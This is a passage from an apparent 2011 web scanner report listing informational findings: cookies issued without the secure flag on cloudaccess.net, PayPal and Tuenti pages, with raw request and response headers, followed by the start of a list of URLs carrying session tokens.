Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Last-Modified: Thu, 23 Dec 2010 04:28:12 GMT
Expires: Mon, 24 Jan 2011 16:19:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

8.26. https://www.cloudaccess.net/network-sla.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/network-sla.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Last-Modified: Tue, 30 Nov 1999 06:00:00 GMT
Expires: Mon, 24 Jan 2011 16:19:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

8.27. https://www.cloudaccess.net/privacy-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/privacy-policy.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 17:55:06 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

8.28. https://www.cloudaccess.net/support-sla.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/support-sla.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Last-Modified: Mon, 22 Nov 2010 16:52:12 GMT
Expires: Mon, 24 Jan 2011 16:19:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

8.29. https://www.cloudaccess.net/terms-of-service.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/terms-of-service.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms-of-service.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Fri, 02 Jul 2010 09:07:32 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

8.30. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

Apache=10.190.8.167.1295914136420337; path=/; expires=Thu, 17-Jan-41 00:08:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.31. https://www.tuenti.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.tuenti.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Connection: close
Date: Tue, 25 Jan 2011 04:39:29 GMT
Content-Length: 1611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

9. Session token in URL previous next
There are 88 instances of this issue:

http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard
http://bh.contextweb.com/bh/set.aspx
http://feedburner.google.com/fb/a/mailverify
http://groups.google.com/group/joomla-commits/topics
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
